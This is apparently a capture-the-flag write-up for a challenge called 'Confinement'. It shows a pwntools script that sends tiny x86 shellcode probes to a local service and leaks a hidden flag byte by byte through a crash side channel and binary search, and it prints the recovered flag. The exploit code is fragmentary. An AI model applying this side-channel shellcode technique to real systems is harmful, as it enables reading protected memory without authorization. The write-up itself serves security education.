Skip to main content

Confinement

Challenge

Payload length limits force a side-channel approach. The solver builds tiny shellcode probes and does byte-wise binary search on hidden data.

Solution

Key solve code:

main_ret = 0x222c6
flag = elf.sym["FLAG"]
shift = flag - main_ret

s = asm(f"""
mov rax, [rsp]
add rax, {shift}
cmp BYTE PTR [rax + 0xff], 0xfe
jbe kaboom
ret
kaboom:
""")

def test(index, imm):
	p = remote("localhost", 1337)
	p.send(payload(index, imm))
	res = p.recvline().startswith(b"adios")
	p.close()
	return res

def binary_search(pos):
	lo, hi = 0, len(h)
	while lo != hi:
		mid = (lo + hi) // 2
		if test(pos, h[mid]):
			lo = mid + 1
		else:
			hi = mid
	return h[lo]

Flag

gigem{3xf1l_5ucc3ss!}